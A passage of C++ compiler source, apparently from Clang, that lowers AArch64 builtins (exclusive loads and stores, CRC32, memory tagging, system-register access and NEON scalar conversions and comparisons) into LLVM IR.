Ops[i] = EmitScalarExpr(E->getArg(i));
llvm::Type *Ty = CGM.getTypes().ConvertType(FD->getType());
llvm::FunctionType *FTy = cast<llvm::FunctionType>(Ty);
StringRef Name = FD->getName();
return EmitNounwindRuntimeCall(CGM.CreateRuntimeFunction(FTy, Name), Ops);
}
if ((BuiltinID == AArch64::BI__builtin_arm_ldrex ||
BuiltinID == AArch64::BI__builtin_arm_ldaex) &&
getContext().getTypeSize(E->getType()) == 128) {
Function *F = CGM.getIntrinsic(BuiltinID == AArch64::BI__builtin_arm_ldaex
? Intrinsic::aarch64_ldaxp
: Intrinsic::aarch64_ldxp);
Value *LdPtr = EmitScalarExpr(E->getArg(0));
Value *Val = Builder.CreateCall(F, Builder.CreateBitCast(LdPtr, Int8PtrTy),
"ldxp");
Value *Val0 = Builder.CreateExtractValue(Val, 1);
Value *Val1 = Builder.CreateExtractValue(Val, 0);
llvm::Type *Int128Ty = llvm::IntegerType::get(getLLVMContext(), 128);
Val0 = Builder.CreateZExt(Val0, Int128Ty);
Val1 = Builder.CreateZExt(Val1, Int128Ty);
Value *ShiftCst = llvm::ConstantInt::get(Int128Ty, 64);
Val = Builder.CreateShl(Val0, ShiftCst, "shl", true /* nuw */);
Val = Builder.CreateOr(Val, Val1);
return Builder.CreateBitCast(Val, ConvertType(E->getType()));
} else if (BuiltinID == AArch64::BI__builtin_arm_ldrex ||
BuiltinID == AArch64::BI__builtin_arm_ldaex) {
Value *LoadAddr = EmitScalarExpr(E->getArg(0));
QualType Ty = E->getType();
llvm::Type *RealResTy = ConvertType(Ty);
llvm::Type *PtrTy = llvm::IntegerType::get(
getLLVMContext(), getContext().getTypeSize(Ty))->getPointerTo();
LoadAddr = Builder.CreateBitCast(LoadAddr, PtrTy);
Function *F = CGM.getIntrinsic(BuiltinID == AArch64::BI__builtin_arm_ldaex
? Intrinsic::aarch64_ldaxr
: Intrinsic::aarch64_ldxr,
PtrTy);
Value *Val = Builder.CreateCall(F, LoadAddr, "ldxr");
if (RealResTy->isPointerTy())
return Builder.CreateIntToPtr(Val, RealResTy);
llvm::Type *IntResTy = llvm::IntegerType::get(
getLLVMContext(), CGM.getDataLayout().getTypeSizeInBits(RealResTy));
Val = Builder.CreateTruncOrBitCast(Val, IntResTy);
return Builder.CreateBitCast(Val, RealResTy);
}
if ((BuiltinID == AArch64::BI__builtin_arm_strex ||
BuiltinID == AArch64::BI__builtin_arm_stlex) &&
getContext().getTypeSize(E->getArg(0)->getType()) == 128) {
Function *F = CGM.getIntrinsic(BuiltinID == AArch64::BI__builtin_arm_stlex
? Intrinsic::aarch64_stlxp
: Intrinsic::aarch64_stxp);
llvm::Type *STy = llvm::StructType::get(Int64Ty, Int64Ty);
Address Tmp = CreateMemTemp(E->getArg(0)->getType());
EmitAnyExprToMem(E->getArg(0), Tmp, Qualifiers(), /*init*/ true);
Tmp = Builder.CreateBitCast(Tmp, llvm::PointerType::getUnqual(STy));
llvm::Value *Val = Builder.CreateLoad(Tmp);
Value *Arg0 = Builder.CreateExtractValue(Val, 0);
Value *Arg1 = Builder.CreateExtractValue(Val, 1);
Value *StPtr = Builder.CreateBitCast(EmitScalarExpr(E->getArg(1)),
Int8PtrTy);
return Builder.CreateCall(F, {Arg0, Arg1, StPtr}, "stxp");
}
if (BuiltinID == AArch64::BI__builtin_arm_strex ||
BuiltinID == AArch64::BI__builtin_arm_stlex) {
Value *StoreVal = EmitScalarExpr(E->getArg(0));
Value *StoreAddr = EmitScalarExpr(E->getArg(1));
QualType Ty = E->getArg(0)->getType();
llvm::Type *StoreTy = llvm::IntegerType::get(getLLVMContext(),
getContext().getTypeSize(Ty));
StoreAddr = Builder.CreateBitCast(StoreAddr, StoreTy->getPointerTo());
if (StoreVal->getType()->isPointerTy())
StoreVal = Builder.CreatePtrToInt(StoreVal, Int64Ty);
else {
llvm::Type *IntTy = llvm::IntegerType::get(
getLLVMContext(),
CGM.getDataLayout().getTypeSizeInBits(StoreVal->getType()));
StoreVal = Builder.CreateBitCast(StoreVal, IntTy);
StoreVal = Builder.CreateZExtOrBitCast(StoreVal, Int64Ty);
}
Function *F = CGM.getIntrinsic(BuiltinID == AArch64::BI__builtin_arm_stlex
? Intrinsic::aarch64_stlxr
: Intrinsic::aarch64_stxr,
StoreAddr->getType());
return Builder.CreateCall(F, {StoreVal, StoreAddr}, "stxr");
}
if (BuiltinID == AArch64::BI__getReg) {
Expr::EvalResult Result;
if (!E->getArg(0)->EvaluateAsInt(Result, CGM.getContext()))
llvm_unreachable("Sema will ensure that the parameter is constant");
llvm::APSInt Value = Result.Val.getInt();
LLVMContext &Context = CGM.getLLVMContext();
std::string Reg = Value == 31 ? "sp" : "x" + toString(Value, 10);
llvm::Metadata *Ops[] = {llvm::MDString::get(Context, Reg)};
llvm::MDNode *RegName = llvm::MDNode::get(Context, Ops);
llvm::Value *Metadata = llvm::MetadataAsValue::get(Context, RegName);
llvm::Function *F =
CGM.getIntrinsic(llvm::Intrinsic::read_register, {Int64Ty});
return Builder.CreateCall(F, Metadata);
}
if (BuiltinID == AArch64::BI__builtin_arm_clrex) {
Function *F = CGM.getIntrinsic(Intrinsic::aarch64_clrex);
return Builder.CreateCall(F);
}
if (BuiltinID == AArch64::BI_ReadWriteBarrier)
return Builder.CreateFence(llvm::AtomicOrdering::SequentiallyConsistent,
llvm::SyncScope::SingleThread);
// CRC32
Intrinsic::ID CRCIntrinsicID = Intrinsic::not_intrinsic;
switch (BuiltinID) {
case AArch64::BI__builtin_arm_crc32b:
CRCIntrinsicID = Intrinsic::aarch64_crc32b; break;
case AArch64::BI__builtin_arm_crc32cb:
CRCIntrinsicID = Intrinsic::aarch64_crc32cb; break;
case AArch64::BI__builtin_arm_crc32h:
CRCIntrinsicID = Intrinsic::aarch64_crc32h; break;
case AArch64::BI__builtin_arm_crc32ch:
CRCIntrinsicID = Intrinsic::aarch64_crc32ch; break;
case AArch64::BI__builtin_arm_crc32w:
CRCIntrinsicID = Intrinsic::aarch64_crc32w; break;
case AArch64::BI__builtin_arm_crc32cw:
CRCIntrinsicID = Intrinsic::aarch64_crc32cw; break;
case AArch64::BI__builtin_arm_crc32d:
CRCIntrinsicID = Intrinsic::aarch64_crc32x; break;
case AArch64::BI__builtin_arm_crc32cd:
CRCIntrinsicID = Intrinsic::aarch64_crc32cx; break;
}
if (CRCIntrinsicID != Intrinsic::not_intrinsic) {
Value *Arg0 = EmitScalarExpr(E->getArg(0));
Value *Arg1 = EmitScalarExpr(E->getArg(1));
Function *F = CGM.getIntrinsic(CRCIntrinsicID);
llvm::Type *DataTy = F->getFunctionType()->getParamType(1);
Arg1 = Builder.CreateZExtOrBitCast(Arg1, DataTy);
return Builder.CreateCall(F, {Arg0, Arg1});
}
// Memory Tagging Extensions (MTE) Intrinsics
Intrinsic::ID MTEIntrinsicID = Intrinsic::not_intrinsic;
switch (BuiltinID) {
case AArch64::BI__builtin_arm_irg:
MTEIntrinsicID = Intrinsic::aarch64_irg; break;
case AArch64::BI__builtin_arm_addg:
MTEIntrinsicID = Intrinsic::aarch64_addg; break;
case AArch64::BI__builtin_arm_gmi:
MTEIntrinsicID = Intrinsic::aarch64_gmi; break;
case AArch64::BI__builtin_arm_ldg:
MTEIntrinsicID = Intrinsic::aarch64_ldg; break;
case AArch64::BI__builtin_arm_stg:
MTEIntrinsicID = Intrinsic::aarch64_stg; break;
case AArch64::BI__builtin_arm_subp:
MTEIntrinsicID = Intrinsic::aarch64_subp; break;
}
if (MTEIntrinsicID != Intrinsic::not_intrinsic) {
llvm::Type *T = ConvertType(E->getType());
if (MTEIntrinsicID == Intrinsic::aarch64_irg) {
Value *Pointer = EmitScalarExpr(E->getArg(0));
Value *Mask = EmitScalarExpr(E->getArg(1));
Pointer = Builder.CreatePointerCast(Pointer, Int8PtrTy);
Mask = Builder.CreateZExt(Mask, Int64Ty);
Value *RV = Builder.CreateCall(
CGM.getIntrinsic(MTEIntrinsicID), {Pointer, Mask});
return Builder.CreatePointerCast(RV, T);
}
if (MTEIntrinsicID == Intrinsic::aarch64_addg) {
Value *Pointer = EmitScalarExpr(E->getArg(0));
Value *TagOffset = EmitScalarExpr(E->getArg(1));
Pointer = Builder.CreatePointerCast(Pointer, Int8PtrTy);
TagOffset = Builder.CreateZExt(TagOffset, Int64Ty);
Value *RV = Builder.CreateCall(
CGM.getIntrinsic(MTEIntrinsicID), {Pointer, TagOffset});
return Builder.CreatePointerCast(RV, T);
}
if (MTEIntrinsicID == Intrinsic::aarch64_gmi) {
Value *Pointer = EmitScalarExpr(E->getArg(0));
Value *ExcludedMask = EmitScalarExpr(E->getArg(1));
ExcludedMask = Builder.CreateZExt(ExcludedMask, Int64Ty);
Pointer = Builder.CreatePointerCast(Pointer, Int8PtrTy);
return Builder.CreateCall(
CGM.getIntrinsic(MTEIntrinsicID), {Pointer, ExcludedMask});
}
// Although it is possible to supply a different return
// address (first arg) to this intrinsic, for now we set
// return address same as input address.
if (MTEIntrinsicID == Intrinsic::aarch64_ldg) {
Value *TagAddress = EmitScalarExpr(E->getArg(0));
TagAddress = Builder.CreatePointerCast(TagAddress, Int8PtrTy);
Value *RV = Builder.CreateCall(
CGM.getIntrinsic(MTEIntrinsicID), {TagAddress, TagAddress});
return Builder.CreatePointerCast(RV, T);
}
// Although it is possible to supply a different tag (to set)
// to this intrinsic (as first arg), for now we supply
// the tag that is in input address arg (common use case).
if (MTEIntrinsicID == Intrinsic::aarch64_stg) {
Value *TagAddress = EmitScalarExpr(E->getArg(0));
TagAddress = Builder.CreatePointerCast(TagAddress, Int8PtrTy);
return Builder.CreateCall(
CGM.getIntrinsic(MTEIntrinsicID), {TagAddress, TagAddress});
}
if (MTEIntrinsicID == Intrinsic::aarch64_subp) {
Value *PointerA = EmitScalarExpr(E->getArg(0));
Value *PointerB = EmitScalarExpr(E->getArg(1));
PointerA = Builder.CreatePointerCast(PointerA, Int8PtrTy);
PointerB = Builder.CreatePointerCast(PointerB, Int8PtrTy);
return Builder.CreateCall(
CGM.getIntrinsic(MTEIntrinsicID), {PointerA, PointerB});
}
}
if (BuiltinID == AArch64::BI__builtin_arm_rsr ||
BuiltinID == AArch64::BI__builtin_arm_rsr64 ||
BuiltinID == AArch64::BI__builtin_arm_rsrp ||
BuiltinID == AArch64::BI__builtin_arm_wsr ||
BuiltinID == AArch64::BI__builtin_arm_wsr64 ||
BuiltinID == AArch64::BI__builtin_arm_wsrp) {
SpecialRegisterAccessKind AccessKind = Write;
if (BuiltinID == AArch64::BI__builtin_arm_rsr ||
BuiltinID == AArch64::BI__builtin_arm_rsr64 ||
BuiltinID == AArch64::BI__builtin_arm_rsrp)
AccessKind = VolatileRead;
bool IsPointerBuiltin = BuiltinID == AArch64::BI__builtin_arm_rsrp ||
BuiltinID == AArch64::BI__builtin_arm_wsrp;
bool Is64Bit = BuiltinID != AArch64::BI__builtin_arm_rsr &&
BuiltinID != AArch64::BI__builtin_arm_wsr;
llvm::Type *ValueType;
llvm::Type *RegisterType = Int64Ty;
if (IsPointerBuiltin) {
ValueType = VoidPtrTy;
} else if (Is64Bit) {
ValueType = Int64Ty;
} else {
ValueType = Int32Ty;
}
return EmitSpecialRegisterBuiltin(*this, E, RegisterType, ValueType,
AccessKind);
}
if (BuiltinID == AArch64::BI_ReadStatusReg ||
BuiltinID == AArch64::BI_WriteStatusReg) {
LLVMContext &Context = CGM.getLLVMContext();
unsigned SysReg =
E->getArg(0)->EvaluateKnownConstInt(getContext()).getZExtValue();
std::string SysRegStr;
llvm::raw_string_ostream(SysRegStr) <<
((1 << 1) | ((SysReg >> 14) & 1)) << ":" <<
((SysReg >> 11) & 7) << ":" <<
((SysReg >> 7) & 15) << ":" <<
((SysReg >> 3) & 15) << ":" <<
( SysReg & 7);
llvm::Metadata *Ops[] = { llvm::MDString::get(Context, SysRegStr) };
llvm::MDNode *RegName = llvm::MDNode::get(Context, Ops);
llvm::Value *Metadata = llvm::MetadataAsValue::get(Context, RegName);
llvm::Type *RegisterType = Int64Ty;
llvm::Type *Types[] = { RegisterType };
if (BuiltinID == AArch64::BI_ReadStatusReg) {
llvm::Function *F = CGM.getIntrinsic(llvm::Intrinsic::read_register, Types);
return Builder.CreateCall(F, Metadata);
}
llvm::Function *F = CGM.getIntrinsic(llvm::Intrinsic::write_register, Types);
llvm::Value *ArgValue = EmitScalarExpr(E->getArg(1));
return Builder.CreateCall(F, { Metadata, ArgValue });
}
if (BuiltinID == AArch64::BI_AddressOfReturnAddress) {
llvm::Function *F =
CGM.getIntrinsic(Intrinsic::addressofreturnaddress, AllocaInt8PtrTy);
return Builder.CreateCall(F);
}
if (BuiltinID == AArch64::BI__builtin_sponentry) {
llvm::Function *F = CGM.getIntrinsic(Intrinsic::sponentry, AllocaInt8PtrTy);
return Builder.CreateCall(F);
}
if (BuiltinID == AArch64::BI__mulh || BuiltinID == AArch64::BI__umulh) {
llvm::Type *ResType = ConvertType(E->getType());
llvm::Type *Int128Ty = llvm::IntegerType::get(getLLVMContext(), 128);
bool IsSigned = BuiltinID == AArch64::BI__mulh;
Value *LHS =
Builder.CreateIntCast(EmitScalarExpr(E->getArg(0)), Int128Ty, IsSigned);
Value *RHS =
Builder.CreateIntCast(EmitScalarExpr(E->getArg(1)), Int128Ty, IsSigned);
Value *MulResult, *HigherBits;
if (IsSigned) {
MulResult = Builder.CreateNSWMul(LHS, RHS);
HigherBits = Builder.CreateAShr(MulResult, 64);
} else {
MulResult = Builder.CreateNUWMul(LHS, RHS);
HigherBits = Builder.CreateLShr(MulResult, 64);
}
HigherBits = Builder.CreateIntCast(HigherBits, ResType, IsSigned);
return HigherBits;
}
// Handle MSVC intrinsics before argument evaluation to prevent double
// evaluation.
if (Optional<MSVCIntrin> MsvcIntId = translateAarch64ToMsvcIntrin(BuiltinID))
return EmitMSVCBuiltinExpr(*MsvcIntId, E);
// Find out if any arguments are required to be integer constant
// expressions.
unsigned ICEArguments = 0;
ASTContext::GetBuiltinTypeError Error;
getContext().GetBuiltinType(BuiltinID, Error, &ICEArguments);
assert(Error == ASTContext::GE_None && "Should not codegen an error");
llvm::SmallVector<Value*, 4> Ops;
Address PtrOp0 = Address::invalid();
for (unsigned i = 0, e = E->getNumArgs() - 1; i != e; i++) {
if (i == 0) {
switch (BuiltinID) {
case NEON::BI__builtin_neon_vld1_v:
case NEON::BI__builtin_neon_vld1q_v:
case NEON::BI__builtin_neon_vld1_dup_v:
case NEON::BI__builtin_neon_vld1q_dup_v:
case NEON::BI__builtin_neon_vld1_lane_v:
case NEON::BI__builtin_neon_vld1q_lane_v:
case NEON::BI__builtin_neon_vst1_v:
case NEON::BI__builtin_neon_vst1q_v:
case NEON::BI__builtin_neon_vst1_lane_v:
case NEON::BI__builtin_neon_vst1q_lane_v:
// Get the alignment for the argument in addition to the value;
// we'll use it later.
PtrOp0 = EmitPointerWithAlignment(E->getArg(0));
Ops.push_back(PtrOp0.getPointer());
continue;
}
}
if ((ICEArguments & (1 << i)) == 0) {
Ops.push_back(EmitScalarExpr(E->getArg(i)));
} else {
// If this is required to be a constant, constant fold it so that we know
// that the generated intrinsic gets a ConstantInt.
Ops.push_back(llvm::ConstantInt::get(
getLLVMContext(),
*E->getArg(i)->getIntegerConstantExpr(getContext())));
}
}
auto SISDMap = makeArrayRef(AArch64SISDIntrinsicMap);
const ARMVectorIntrinsicInfo *Builtin = findARMVectorIntrinsicInMap(
SISDMap, BuiltinID, AArch64SISDIntrinsicsProvenSorted);
if (Builtin) {
Ops.push_back(EmitScalarExpr(E->getArg(E->getNumArgs() - 1)));
Value *Result = EmitCommonNeonSISDBuiltinExpr(*this, *Builtin, Ops, E);
assert(Result && "SISD intrinsic should have been handled");
return Result;
}
const Expr *Arg = E->getArg(E->getNumArgs()-1);
NeonTypeFlags Type(0);
if (Optional<llvm::APSInt> Result = Arg->getIntegerConstantExpr(getContext()))
// Determine the type of this overloaded NEON intrinsic.
Type = NeonTypeFlags(Result->getZExtValue());
bool usgn = Type.isUnsigned();
bool quad = Type.isQuad();
// Handle non-overloaded intrinsics first.
switch (BuiltinID) {
default: break;
case NEON::BI__builtin_neon_vabsh_f16:
Ops.push_back(EmitScalarExpr(E->getArg(0)));
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::fabs, HalfTy), Ops, "vabs");
case NEON::BI__builtin_neon_vaddq_p128: {
llvm::Type *Ty = GetNeonType(this, NeonTypeFlags::Poly128);
Ops.push_back(EmitScalarExpr(E->getArg(1)));
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
Ops[0] = Builder.CreateXor(Ops[0], Ops[1]);
llvm::Type *Int128Ty = llvm::Type::getIntNTy(getLLVMContext(), 128);
return Builder.CreateBitCast(Ops[0], Int128Ty);
}
case NEON::BI__builtin_neon_vldrq_p128: {
llvm::Type *Int128Ty = llvm::Type::getIntNTy(getLLVMContext(), 128);
llvm::Type *Int128PTy = llvm::PointerType::get(Int128Ty, 0);
Value *Ptr = Builder.CreateBitCast(EmitScalarExpr(E->getArg(0)), Int128PTy);
return Builder.CreateAlignedLoad(Int128Ty, Ptr,
CharUnits::fromQuantity(16));
}
case NEON::BI__builtin_neon_vstrq_p128: {
llvm::Type *Int128PTy = llvm::Type::getIntNPtrTy(getLLVMContext(), 128);
Value *Ptr = Builder.CreateBitCast(Ops[0], Int128PTy);
return Builder.CreateDefaultAlignedStore(EmitScalarExpr(E->getArg(1)), Ptr);
}
case NEON::BI__builtin_neon_vcvts_f32_u32:
case NEON::BI__builtin_neon_vcvtd_f64_u64:
usgn = true;
LLVM_FALLTHROUGH;
case NEON::BI__builtin_neon_vcvts_f32_s32:
case NEON::BI__builtin_neon_vcvtd_f64_s64: {
Ops.push_back(EmitScalarExpr(E->getArg(0)));
bool Is64 = Ops[0]->getType()->getPrimitiveSizeInBits() == 64;
llvm::Type *InTy = Is64 ? Int64Ty : Int32Ty;
llvm::Type *FTy = Is64 ? DoubleTy : FloatTy;
Ops[0] = Builder.CreateBitCast(Ops[0], InTy);
if (usgn)
return Builder.CreateUIToFP(Ops[0], FTy);
return Builder.CreateSIToFP(Ops[0], FTy);
}
case NEON::BI__builtin_neon_vcvth_f16_u16:
case NEON::BI__builtin_neon_vcvth_f16_u32:
case NEON::BI__builtin_neon_vcvth_f16_u64:
usgn = true;
LLVM_FALLTHROUGH;
case NEON::BI__builtin_neon_vcvth_f16_s16:
case NEON::BI__builtin_neon_vcvth_f16_s32:
case NEON::BI__builtin_neon_vcvth_f16_s64: {
Ops.push_back(EmitScalarExpr(E->getArg(0)));
llvm::Type *FTy = HalfTy;
llvm::Type *InTy;
if (Ops[0]->getType()->getPrimitiveSizeInBits() == 64)
InTy = Int64Ty;
else if (Ops[0]->getType()->getPrimitiveSizeInBits() == 32)
InTy = Int32Ty;
else
InTy = Int16Ty;
Ops[0] = Builder.CreateBitCast(Ops[0], InTy);
if (usgn)
return Builder.CreateUIToFP(Ops[0], FTy);
return Builder.CreateSIToFP(Ops[0], FTy);
}
case NEON::BI__builtin_neon_vcvtah_u16_f16:
case NEON::BI__builtin_neon_vcvtmh_u16_f16:
case NEON::BI__builtin_neon_vcvtnh_u16_f16:
case NEON::BI__builtin_neon_vcvtph_u16_f16:
case NEON::BI__builtin_neon_vcvth_u16_f16:
case NEON::BI__builtin_neon_vcvtah_s16_f16:
case NEON::BI__builtin_neon_vcvtmh_s16_f16:
case NEON::BI__builtin_neon_vcvtnh_s16_f16:
case NEON::BI__builtin_neon_vcvtph_s16_f16:
case NEON::BI__builtin_neon_vcvth_s16_f16: {
unsigned Int;
llvm::Type* InTy = Int32Ty;
llvm::Type* FTy = HalfTy;
llvm::Type *Tys[2] = {InTy, FTy};
Ops.push_back(EmitScalarExpr(E->getArg(0)));
switch (BuiltinID) {
default: llvm_unreachable("missing builtin ID in switch!");
case NEON::BI__builtin_neon_vcvtah_u16_f16:
Int = Intrinsic::aarch64_neon_fcvtau; break;
case NEON::BI__builtin_neon_vcvtmh_u16_f16:
Int = Intrinsic::aarch64_neon_fcvtmu; break;
case NEON::BI__builtin_neon_vcvtnh_u16_f16:
Int = Intrinsic::aarch64_neon_fcvtnu; break;
case NEON::BI__builtin_neon_vcvtph_u16_f16:
Int = Intrinsic::aarch64_neon_fcvtpu; break;
case NEON::BI__builtin_neon_vcvth_u16_f16:
Int = Intrinsic::aarch64_neon_fcvtzu; break;
case NEON::BI__builtin_neon_vcvtah_s16_f16:
Int = Intrinsic::aarch64_neon_fcvtas; break;
case NEON::BI__builtin_neon_vcvtmh_s16_f16:
Int = Intrinsic::aarch64_neon_fcvtms; break;
case NEON::BI__builtin_neon_vcvtnh_s16_f16:
Int = Intrinsic::aarch64_neon_fcvtns; break;
case NEON::BI__builtin_neon_vcvtph_s16_f16:
Int = Intrinsic::aarch64_neon_fcvtps; break;
case NEON::BI__builtin_neon_vcvth_s16_f16:
Int = Intrinsic::aarch64_neon_fcvtzs; break;
}
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "fcvt");
return Builder.CreateTrunc(Ops[0], Int16Ty);
}
case NEON::BI__builtin_neon_vcaleh_f16:
case NEON::BI__builtin_neon_vcalth_f16:
case NEON::BI__builtin_neon_vcageh_f16:
case NEON::BI__builtin_neon_vcagth_f16: {
unsigned Int;
llvm::Type* InTy = Int32Ty;
llvm::Type* FTy = HalfTy;
llvm::Type *Tys[2] = {InTy, FTy};
Ops.push_back(EmitScalarExpr(E->getArg(1)));
switch (BuiltinID) {
default: llvm_unreachable("missing builtin ID in switch!");
case NEON::BI__builtin_neon_vcageh_f16:
Int = Intrinsic::aarch64_neon_facge; break;
case NEON::BI__builtin_neon_vcagth_f16:
Int = Intrinsic::aarch64_neon_facgt; break;
case NEON::BI__builtin_neon_vcaleh_f16:
Int = Intrinsic::aarch64_neon_facge; std::swap(Ops[0], Ops[1]); break;
case NEON::BI__builtin_neon_vcalth_f16:
Int = Intrinsic::aarch64_neon_facgt; std::swap(Ops[0], Ops[1]); break;
}
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "facg");
return Builder.CreateTrunc(Ops[0], Int16Ty);
}
case NEON::BI__builtin_neon_vcvth_n_s16_f16:
case NEON::BI__builtin_neon_vcvth_n_u16_f16: {
unsigned Int;
llvm::Type* InTy = Int32Ty;
llvm::Type* FTy = HalfTy;
llvm::Type *Tys[2] = {InTy, FTy};
Ops.push_back(EmitScalarExpr(E->getArg(1)));
switch (BuiltinID) {
default: llvm_unreachable("missing builtin ID in switch!");
case NEON::BI__builtin_neon_vcvth_n_s16_f16:
Int = Intrinsic::aarch64_neon_vcvtfp2fxs; break;
case NEON::BI__builtin_neon_vcvth_n_u16_f16:
Int = Intrinsic::aarch64_neon_vcvtfp2fxu; break;
}
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "fcvth_n");
return Builder.CreateTrunc(Ops[0], Int16Ty);
}
case NEON::BI__builtin_neon_vcvth_n_f16_s16:
case NEON::BI__builtin_neon_vcvth_n_f16_u16: {
unsigned Int;
llvm::Type* FTy = HalfTy;
llvm::Type* InTy = Int32Ty;
llvm::Type *Tys[2] = {FTy, InTy};
Ops.push_back(EmitScalarExpr(E->getArg(1)));
switch (BuiltinID) {
default: llvm_unreachable("missing builtin ID in switch!");
case NEON::BI__builtin_neon_vcvth_n_f16_s16:
Int = Intrinsic::aarch64_neon_vcvtfxs2fp;
Ops[0] = Builder.CreateSExt(Ops[0], InTy, "sext");
break;
case NEON::BI__builtin_neon_vcvth_n_f16_u16:
Int = Intrinsic::aarch64_neon_vcvtfxu2fp;
Ops[0] = Builder.CreateZExt(Ops[0], InTy);
break;
}
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "fcvth_n");
}
case NEON::BI__builtin_neon_vpaddd_s64: {
auto *Ty = llvm::FixedVectorType::get(Int64Ty, 2);
Value *Vec = EmitScalarExpr(E->getArg(0));
// The vector is v2f64, so make sure it's bitcast to that.
Vec = Builder.CreateBitCast(Vec, Ty, "v2i64");
llvm::Value *Idx0 = llvm::ConstantInt::get(SizeTy, 0);
llvm::Value *Idx1 = llvm::ConstantInt::get(SizeTy, 1);
Value *Op0 = Builder.CreateExtractElement(Vec, Idx0, "lane0");
Value *Op1 = Builder.CreateExtractElement(Vec, Idx1, "lane1");
// Pairwise addition of a v2f64 into a scalar f64.
return Builder.CreateAdd(Op0, Op1, "vpaddd");
}
case NEON::BI__builtin_neon_vpaddd_f64: {
auto *Ty = llvm::FixedVectorType::get(DoubleTy, 2);
Value *Vec = EmitScalarExpr(E->getArg(0));
// The vector is v2f64, so make sure it's bitcast to that.
Vec = Builder.CreateBitCast(Vec, Ty, "v2f64");
llvm::Value *Idx0 = llvm::ConstantInt::get(SizeTy, 0);
llvm::Value *Idx1 = llvm::ConstantInt::get(SizeTy, 1);
Value *Op0 = Builder.CreateExtractElement(Vec, Idx0, "lane0");
Value *Op1 = Builder.CreateExtractElement(Vec, Idx1, "lane1");
// Pairwise addition of a v2f64 into a scalar f64.
return Builder.CreateFAdd(Op0, Op1, "vpaddd");
}
case NEON::BI__builtin_neon_vpadds_f32: {
auto *Ty = llvm::FixedVectorType::get(FloatTy, 2);
Value *Vec = EmitScalarExpr(E->getArg(0));
// The vector is v2f32, so make sure it's bitcast to that.
Vec = Builder.CreateBitCast(Vec, Ty, "v2f32");
llvm::Value *Idx0 = llvm::ConstantInt::get(SizeTy, 0);
llvm::Value *Idx1 = llvm::ConstantInt::get(SizeTy, 1);
Value *Op0 = Builder.CreateExtractElement(Vec, Idx0, "lane0");
Value *Op1 = Builder.CreateExtractElement(Vec, Idx1, "lane1");
// Pairwise addition of a v2f32 into a scalar f32.
return Builder.CreateFAdd(Op0, Op1, "vpaddd");
}
case NEON::BI__builtin_neon_vceqzd_s64:
case NEON::BI__builtin_neon_vceqzd_f64:
case NEON::BI__builtin_neon_vceqzs_f32:
case NEON::BI__builtin_neon_vceqzh_f16:
Ops.push_back(EmitScalarExpr(E->getArg(0)));
return EmitAArch64CompareBuiltinExpr(
Ops[0], ConvertType(E->getCallReturnType(getContext())),
ICmpInst::FCMP_OEQ, ICmpInst::ICMP_EQ, "vceqz");
case NEON::BI__builtin_neon_vcgezd_s64:
case NEON::BI__builtin_neon_vcgezd_f64:
case NEON::BI__builtin_neon_vcgezs_f32:
case NEON::BI__builtin_neon_vcgezh_f16:
Ops.push_back(EmitScalarExpr(E->getArg(0)));
return EmitAArch64CompareBuiltinExpr(
Ops[0], ConvertType(E->getCallReturnType(getContext())),
ICmpInst::FCMP_OGE, ICmpInst::ICMP_SGE, "vcgez");
case NEON::BI__builtin_neon_vclezd_s64:
case NEON::BI__builtin_neon_vclezd_f64:
case NEON::BI__builtin_neon_vclezs_f32:
case NEON::BI__builtin_neon_vclezh_f16:
Ops.push_back(EmitScalarExpr(E->getArg(0)));
return EmitAArch64CompareBuiltinExpr(
Ops[0], ConvertType(E->getCallReturnType(getContext())),
ICmpInst::FCMP_OLE, ICmpInst::ICMP_SLE, "vclez");
case NEON::BI__builtin_neon_vcgtzd_s64:
case NEON::BI__builtin_neon_vcgtzd_f64:
case NEON::BI__builtin_neon_vcgtzs_f32:
case NEON::BI__builtin_neon_vcgtzh_f16:
Ops.push_back(EmitScalarExpr(E->getArg(0)));
return EmitAArch64CompareBuiltinExpr(
Ops[0], ConvertType(E->getCallReturnType(getContext())),
ICmpInst::FCMP_OGT, ICmpInst::ICMP_SGT, "vcgtz");
case NEON::BI__builtin_neon_vcltzd_s64:
case NEON::BI__builtin_neon_vcltzd_f64:
case NEON::BI__builtin_neon_vcltzs_f32:
case NEON::BI__builtin_neon_vcltzh_f16:
Ops.push_back(EmitScalarExpr(E->getArg(0)));
return EmitAArch64CompareBuiltinExpr(
Ops[0], ConvertType(E->getCallReturnType(getContext())),
ICmpInst::FCMP_OLT, ICmpInst::ICMP_SLT, "vcltz");
case NEON::BI__builtin_neon_vceqzd_u64: {
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = Builder.CreateBitCast(Ops[0], Int64Ty);
Ops[0] =
Builder.CreateICmpEQ(Ops[0], llvm::Constant::getNullValue(Int64Ty));
return Builder.CreateSExt(Ops[0], Int64Ty, "vceqzd");
}
case NEON::BI__builtin_neon_vceqd_f64:
case NEON::BI__builtin_neon_vcled_f64:
case NEON::BI__builtin_neon_vcltd_f64:
case NEON::BI__builtin_neon_vcged_f64:
case NEON::BI__builtin_neon_vcgtd_f64: {
llvm::CmpInst::Predicate P;
switch (BuiltinID) {
default: llvm_unreachable("missing builtin ID in switch!");
case NEON::BI__builtin_neon_vceqd_f64: P = llvm::FCmpInst::FCMP_OEQ; break;
case NEON::BI__builtin_neon_vcled_f64: P = llvm::FCmpInst::FCMP_OLE; break;
case NEON::BI__builtin_neon_vcltd_f64: P = llvm::FCmpInst::FCMP_OLT; break;
case NEON::BI__builtin_neon_vcged_f64: P = llvm::FCmpInst::FCMP_OGE; break;
case NEON::BI__builtin_neon_vcgtd_f64: P = llvm::FCmpInst::FCMP_OGT; break;
}
Ops.push_back(EmitScalarExpr(E->getArg(1)));
Ops[0] = Builder.CreateBitCast(Ops[0], DoubleTy);
Ops[1] = Builder.CreateBitCast(Ops[1], DoubleTy);
Ops[0] = Builder.CreateFCmp(P, Ops[0], Ops[1]);
return Builder.CreateSExt(Ops[0], Int64Ty, "vcmpd");
}
case NEON::BI__builtin_neon_vceqs_f32:
case NEON::BI__builtin_neon_vcles_f32:
case NEON::BI__builtin_neon_vclts_f32:
case NEON::BI__builtin_neon_vcges_f32:
case NEON::BI__builtin_neon_vcgts_f32: {
llvm::CmpInst::Predicate P;
